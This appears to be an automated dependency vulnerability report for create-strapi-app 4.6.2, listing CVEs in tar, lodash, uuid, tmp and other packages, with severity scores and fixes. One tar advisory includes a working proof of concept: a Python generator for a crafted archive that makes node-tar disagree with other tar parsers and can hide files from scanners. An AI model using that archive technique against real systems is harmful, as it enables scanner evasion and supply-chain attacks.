Vulnerable Library - create-strapi-app-4.6.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, a Remediation PR cannot be created automatically for a vulnerability despite the availability of a remediation.
Details
CVE-2026-41907
Vulnerable Library - uuid-8.3.2.tgz
RFC4122 (v1, v4, and v5) UUIDs
Library home page: https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ uuid-8.3.2.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.
Publish Date: 2026-04-24
URL: CVE-2026-41907
CVSS 3 Score Details (9.8)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: None
  - Scope: Unchanged
- Impact Metrics:
  - Confidentiality Impact: High
  - Integrity Impact: High
  - Availability Impact: High
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-w5hq-g745-h8pq
Release Date: 2026-04-24
Fix Resolution: https://github.com/uuidjs/uuid.git - v11.1.1, https://github.com/uuidjs/uuid.git - v13.0.1, https://github.com/uuidjs/uuid.git - v12.0.1
Step up your Open Source Security Game with Mend here
CVE-2026-23950
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar, a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to incomplete handling of Unicode path collisions in the "path-reservations" system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, on which it has been tested), the library fails to lock colliding paths (e.g., "ß" and "ss"), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions.

The library uses a "PathReservations" system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because the library uses "NFD" Unicode normalization (under which "ß" and "ss" are different), conflicting paths do not have their order properly preserved on filesystems that ignore Unicode normalization (e.g., APFS, on which "ß" causes an inode collision with "ss"). This enables an attacker to circumvent internal parallelization locks ("PathReservations") using conflicting filenames within a malicious tar archive.

The patch in version 7.5.4 updates "path-reservations.js" to use a normalization form that matches the target filesystem's behavior (e.g., "NFKD"), followed by first "toLocaleLowerCase('en')" and then "toLocaleUpperCase('en')". As a workaround, users who cannot upgrade promptly, and who are programmatically using "node-tar" to extract arbitrary tarball data, should filter out all "SymbolicLink" entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.
Publish Date: 2026-01-20
URL: CVE-2026-23950
CVSS 3 Score Details (8.8)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: Required
  - Scope: Changed
- Impact Metrics:
  - Confidentiality Impact: Low
  - Integrity Impact: High
  - Availability Impact: Low
Suggested Fix
Type: Upgrade version
Origin: GHSA-r6q2-hw4h-h46w
Release Date: 2026-01-20
Fix Resolution (tar): 7.5.4
Direct dependency fix Resolution (create-strapi-app): 5.36.1
CVE-2026-24842
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar, a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.
Publish Date: 2026-01-28
URL: CVE-2026-24842
CVSS 3 Score Details (8.2)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: Required
  - Scope: Changed
- Impact Metrics:
  - Confidentiality Impact: High
  - Integrity Impact: Low
  - Availability Impact: None
Suggested Fix
Type: Upgrade version
Release Date: 2026-01-28
Fix Resolution (tar): 7.5.7
Direct dependency fix Resolution (create-strapi-app): 5.36.1
CVE-2026-4800
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ lodash-4.17.21.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Impact:
The fix for CVE-2021-23337 (GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches:
Users should upgrade to version 4.18.0.
Workarounds:
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
Publish Date: 2026-03-31
URL: CVE-2026-4800
CVSS 3 Score Details (8.1)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Network
  - Attack Complexity: High
  - Privileges Required: None
  - User Interaction: None
  - Scope: Unchanged
- Impact Metrics:
  - Confidentiality Impact: High
  - Integrity Impact: High
  - Availability Impact: High
Suggested Fix
Type: Upgrade version
Origin: GHSA-r5fr-rjxr-66jc
Release Date: 2026-03-31
Fix Resolution: lodash-amd - 4.18.0, lodash.template - 4.18.0, lodash-es - 4.18.0, lodash - 4.18.0
CVE-2026-44705
Vulnerable Library - tmp-0.0.33.tgz
Temporary file and directory creator
Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - inquirer-8.2.5.tgz
    - external-editor-3.1.0.tgz
      - ❌ tmp-0.0.33.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
tmp is a temporary file and directory creator for node.js. Prior to 0.2.6, the tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization. This vulnerability is fixed in 0.2.6.
Publish Date: 2026-06-11
URL: CVE-2026-44705
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: None
  - Scope: Unchanged
- Impact Metrics:
  - Confidentiality Impact: High
  - Integrity Impact: None
  - Availability Impact: None
Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/raszi/node-tmp.git - v0.2.6
CVE-2025-13465
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ lodash-4.17.21.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.
The issue permits deletion of properties but does not allow overwriting their original behavior.
This issue is patched in 4.17.23.
Publish Date: 2026-01-21
URL: CVE-2025-13465
CVSS 3 Score Details (7.2)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: None
  - Scope: Changed
- Impact Metrics:
  - Confidentiality Impact: None
  - Integrity Impact: Low
  - Availability Impact: Low
Suggested Fix
Type: Upgrade version
Origin: GHSA-xxjr-mmjv-4gpg
Release Date: 2026-01-21
Fix Resolution: lodash-amd - 4.17.23, lodash - 4.17.23, lodash-es - 4.17.23
CVE-2026-31802
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.
Publish Date: 2026-03-09
URL: CVE-2026-31802
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Local
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: None
  - Scope: Changed
- Impact Metrics:
  - Confidentiality Impact: None
  - Integrity Impact: High
  - Availability Impact: None
Suggested Fix
Type: Upgrade version
Release Date: 2026-03-09
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.11
CVE-2026-29786
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.
Publish Date: 2026-03-07
URL: CVE-2026-29786
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Local
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: Required
  - Scope: Changed
- Impact Metrics:
  - Confidentiality Impact: None
  - Integrity Impact: High
  - Availability Impact: Low
Suggested Fix
Type: Upgrade version
Release Date: 2026-03-07
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.10
CVE-2026-26960
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.
Publish Date: 2026-02-20
URL: CVE-2026-26960
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Local
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: Required
  - Scope: Unchanged
- Impact Metrics:
  - Confidentiality Impact: High
  - Integrity Impact: High
  - Availability Impact: None
Suggested Fix
Type: Upgrade version
Release Date: 2026-02-18
Fix Resolution (tar): 7.5.8
Direct dependency fix Resolution (create-strapi-app): 5.37.0
CVE-2026-23745
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.
Publish Date: 2026-01-16
URL: CVE-2026-23745
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Local
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: Required
  - Scope: Changed
- Impact Metrics:
  - Confidentiality Impact: High
  - Integrity Impact: Low
  - Availability Impact: None
Suggested Fix
Type: Upgrade version
Release Date: 2026-01-16
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.3
CVE-2026-2950
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ lodash-4.17.21.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Impact:
Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for CVE-2025-13465 (GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.
The issue permits deletion of prototype properties but does not allow overwriting their original behavior.
Patches:
This issue is patched in 4.18.0.
Workarounds:
None. Upgrade to the patched version.
Publish Date: 2026-03-31
URL: CVE-2026-2950
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: None
  - Scope: Unchanged
- Impact Metrics:
  - Confidentiality Impact: None
  - Integrity Impact: Low
  - Availability Impact: Low
Suggested Fix
Type: Upgrade version
Origin: GHSA-xxjr-mmjv-4gpg
Release Date: 2026-03-31
Fix Resolution (lodash): 4.17.23
Direct dependency fix Resolution (create-strapi-app): 5.37.0
CVE-2024-28863
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no limit on the number of sub-folders created in the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running node-tar and even crash the Node.js client within a few seconds of running it, using a path with too many sub-folders inside. Version 6.2.1 fixes this issue by preventing extraction into excessively deep sub-folders.
Publish Date: 2024-03-21
URL: CVE-2024-28863
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: Required
  - Scope: Unchanged
- Impact Metrics:
  - Confidentiality Impact: None
  - Integrity Impact: None
  - Availability Impact: High
Suggested Fix
Type: Upgrade version
Origin: GHSA-f5x3-32g6-xq36
Release Date: 2024-03-21
Fix Resolution: tar - 6.2.1
CVE-2026-53655
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Summary:
"tar" (node-tar) applies a PAX extended header's "size=" record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name ("L") or long-link ("K") entry. Per POSIX pax, a PAX extended header ("x") describes the next file entry, not the intermediary extension headers that may sit between the "x" header and the file it annotates. Because node-tar lets the PAX "size" override the byte length of an intervening "L"/"K"/"x" header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python "tarfile", and the now-fixed "tar-rs" / "astral-tokio-tar"). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools. An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another). node-tar is one of the most widely deployed JavaScript tar libraries (it backs "npm"'s own package-tarball handling and is a transitive dependency of a very large fraction of the npm ecosystem), so the blast radius for "files that extract differently depending on the tool" is broad. This is the same root cause and fix that was just addressed upstream in the Rust tar ecosystem ("tar-rs" / "astral-tokio-tar"); node-tar carries the equivalent defect and has no equivalent guard.

Impact:
- CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as the prior tar "smuggling" advisories GHSA-j5gw-2vrg-8fgx and GHSA-fp55-jw48-c537).
- A crafted archive can present one logical member list to a tool that lists or scans with node-tar and a different member list to GNU tar / libarchive / Python tarfile (and vice versa). This lets a malicious file be hidden from a scanner that uses a different parser than the eventual extractor, or hidden from node-tar-based inspection while still landing on disk via a system "tar".
- No authentication is required; the only precondition is that a victim parses an attacker-supplied tar with node-tar. Tar archives are routinely fetched from untrusted sources (package registries, user uploads, CI artifacts, container layers).
- Severity: Medium. Impact is integrity-of-archive-interpretation, not direct RCE; it is a building block for supply-chain / scanner-evasion attacks rather than a standalone code-execution primitive.

Vulnerable code (file:line):
"src/header.ts" (compiled to "dist/esm/header.js:49" and "dist/commonjs/header.js:85" in the published "tar@7.5.15"):

    // Header.decode(buf, off, ex, gex)
    this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)

"ex" is the currently-accumulated PAX local extended header and "gex" the PAX global header. The "size" override from "ex"/"gex" is applied unconditionally to whatever header is being decoded next — there is no check that the header being decoded is a real file entry rather than an intermediary extension header.

"src/parse.ts", "[CONSUMEHEADER]" constructs the next header with the current "EX"/"GEX" applied:

    const header = new Header(chunk, position, this[EX], this[GEX])

and later branches on whether that header is a metadata entry. "this[EX]" is cleared only in the non-meta (real file) branch:

    if (entry.meta) {
      // L / K / x / g metadata entries: this[EX] is left intact here
      if (entry.size > this.maxMetaEntrySize) {
        entry.ignore = true
        this[STATE] = 'ignore'
        entry.resume()
      } else if (entry.size > 0) {
        this[META] = ''
        entry.on('data', c => (this[META] += c))
        this[STATE] = 'meta'
      }
    } else {
      this[EX] = undefined // EX cleared only once a real file entry is reached
    }

When the stream is ordered "x (PAX, size=N) -> L (GNU long-name) -> file", the "L" header is constructed with "this[EX]" still set, so its "size"/"remain" becomes "N" instead of the "L" payload's true length. node-tar then consumes "N" bytes of "metadata" and resumes header parsing at the wrong offset, landing mid-stream. Every other mainstream parser applies the PAX "size" only to the following file entry, so they stay synchronized. The correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is to not apply PAX "size"/overrides when the entry being decoded is itself an extension header ("L" GNU long-name, "K" GNU long-link, "x" PAX local, "g" PAX global).

How input reaches the sink:
"tar.list()", "tar.extract()"/"tar.x()", and "tar.Parse"/"tar.Unpack" all route every 512-byte header block through "Header.decode(...)" with the currently-accumulated "EX"/"GEX". Any consumer that parses an attacker-supplied archive — "tar.list", "tar.extract", or piping into the streaming "Parser" — reaches the sink. No options need to be enabled; the default code path is affected.

Proof of concept:
Archive layout (all standard, GNU-tar-producible blocks):

    block 0 : x header (PAX local extended, typeflag 'x'), its own size = len(pax body)
    block 1 : x payload : the single PAX record "...size=2048\n"
    block 2 : L header (GNU long-name '././@LongLink'), real size = 13
    block 3 : L payload : "longname.txt\0" (the long name for the next file)
    block 4 : file header 'file_a', size = 16
    block 5 : file_a body (16 bytes, zero-padded to 512)
    block 6 : file header 'file_b', size = 16
    block 7 : file_b body (16 bytes, zero-padded to 512)

Generator ("make_tar.py", pure stdlib, no external deps):

    def hdr(name, size, typeflag):
        h = bytearray(512); name = name[:100]; h[0:len(name)] = name
        h[100:108] = b'0000644\0'; h[108:116] = b'0000000\0'; h[116:124] = b'0000000\0'
        h[124:136] = ('%011o\0' % size).encode(); h[136:148] = b'00000000000\0'
        h[156:157] = typeflag; h[257:263] = b'ustar\0'; h[263:265] = b'00'
        h[148:156] = b' ' * 8
        cs = sum(h); h[148:156] = ('%06o\0 ' % cs).encode()
        return bytes(h)

    def pad(d):
        return d + b'\0' * ((512 - len(d) % 512) % 512)

    def pax_record(key, val):
        # length-prefixed PAX record "LEN key=val\n"
        body = b' %s=%s\n' % (key.encode(), str(val).encode()); n = len(body)
        while True:
            s = str(n).encode() + body
            if len(s) == n: break
            n = len(s)
        return s

    pax = pax_record('size', 2048)  # malicious: claim size=2048 for the "next" entry
    out = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax)
    out += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\0')
    out += hdr(b'file_a', 16, b'0') + pad(b'AAAA_file_a_body')
    out += hdr(b'file_b', 16, b'0') + pad(b'BBBB_file_b_body')
    out += b'\0' * 1024
    open('pax-desync.tar', 'wb').write(out)

A negative-control archive is identical except the PAX record is "pax_record('comment', 'x')" (no "size="), written to "pax-control.tar".

End-to-end reproduction (against pinned version "tar@7.5.15", latest release):
Install the published package into a clean project and parse both archives:

    $ npm init -y >/dev/null && npm install tar@7.5.15
    $ node -e "console.log(require('tar/package.json').version)"
    7.5.15
    $ grep -n "ex?.size ?? gex?.size" node_modules/tar/dist/esm/header.js
    49:    this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);

"e2e.mjs":

    import * as tar from 'tar'
    async function listEntries(f){
      const got=[], warns=[]
      await tar.list({ file:f,
        onReadEntry:e=>{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },
        onwarn:(code,_msg)=>warns.push(code) })
      return { got, warns }
    }
    const mal = await listEntries('pax-desync.tar')
    console.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns))
    const ctl = await listEntries('pax-control.tar')
    console.log('CONTROL entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns))

Verbatim output:

    === Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===
    [MALICIOUS] archive = x(PAX size=2048) -> L(GNU longname "longname.txt") -> file_a(16B) -> file_b(16B)
    tar.list() entries : []
    tar.list() warnings: ["TAR_ENTRY_INVALID"]
    [NEGATIVE CONTROL] same archive, PAX record is "comment=x" (no size= override)
    tar.list() entries : [{"path":"longname.txt","size":16,"type":"File"},{"path":"file_b","size":16,"type":"File"}]
    tar.list() warnings: []

Reference parsers on the same "pax-desync.tar":

    $ tar tvf pax-desync.tar
    -rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt    # GNU tar
    $ bsdtar tvf pax-desync.tar
    -rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt    # libarchive
    $ python3 -c "import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])"
    ['longname.txt']    # Python tarfile

Interpretation differential: GNU tar, libarchive (bsdtar), and Python "tarfile" all extract the member "longname.txt" from "pax-desync.tar", whereas node-tar "7.5.15" desynchronizes, raises "TAR_ENTRY_INVALID" (checksum failure from landing mid-stream), and reports zero members. The negative control proves the divergence is caused solely by the PAX "size=" override being applied to the intermediary "L" header — when the same archive carries a PAX record without "size=", node-tar parses it identically to the reference tools ("longname.txt", "file_b").

Suggested fix:
When decoding a header, do not apply PAX "size" (or other PAX overrides) if the header being decoded is itself an extension header. Concretely, in "src/parse.ts" clear/ignore "this[EX]" (and "this[GEX]" for "size") when the header's type is "ExtendedHeader", "GlobalExtendedHeader", "NextFileHasLongPath" (GNU "L"), or "NextFileHasLongLinkpath" (GNU "K"); equivalently, in "Header.decode", gate the "ex?.size ?? gex?.size" override on the decoded type not being one of those extension types. This mirrors the upstream Rust fix, which guards "pax_size" with "is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions". A fix PR is being prepared against a private fork and will be linked here.

Fix PR:
To be linked from a private fork of the repository (the fix will not be pushed to any public fork or to upstream during embargo).

Credits:
Reported by tonghuaroot.
Publish Date: 2026-06-15
URL: CVE-2026-53655
CVSS 3 Score Details (6.2)
Base Score Metrics:
- Exploitability Metrics:
  - Attack Vector: Local
  - Attack Complexity: Low
  - Privileges Required: None
  - User Interaction: None
  - Scope: Unchanged
- Impact Metrics:
  - Confidentiality Impact: None
  - Integrity Impact: High
  - Availability Impact: None
Suggested Fix
Type: Upgrade version
Origin: GHSA-vmf3-w455-68vh
Release Date: 2026-06-15
Fix Resolution: tar - 7.5.16
CVE-2024-47764
Vulnerable Library - cookie-0.4.2.tgz
HTTP server cookie parsing and serialization
Library home page: https://registry.npmjs.org/cookie/-/cookie-0.4.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
  - generate-new-4.6.2.tgz
    - node-6.19.7.tgz
      - ❌ cookie-0.4.2.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
cookie is a basic HTTP cookie parser and serializer for HTTP servers. The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie. Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Publish Date: 2024-10-04
URL: CVE-2024-47764
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
Suggested Fix
Type: Upgrade version
Origin: GHSA-pxg6-pf52-xh8x
Release Date: 2024-10-04
Fix Resolution (cookie): 0.7.0
Direct dependency fix Resolution (create-strapi-app): 5.0.0
CVE-2022-25883
Vulnerable Library - semver-7.3.8.tgz
The semantic version parser used by npm.
Library home page: https://registry.npmjs.org/semver/-/semver-7.3.8.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ semver-7.3.8.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
Mend Note: The description of this vulnerability differs from MITRE.
Publish Date: 2023-06-21
URL: CVE-2022-25883
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: Low
Suggested Fix
Type: Upgrade version
Origin: GHSA-c2qf-rxjj-qqgw
Release Date: 2023-06-21
Fix Resolution (semver): 7.5.2
Direct dependency fix Resolution (create-strapi-app): 4.12.0
CVE-2025-54798
Vulnerable Library - tmp-0.0.33.tgz
Temporary file and directory creator
Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- inquirer-8.2.5.tgz
- external-editor-3.1.0.tgz
- ❌ tmp-0.0.33.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
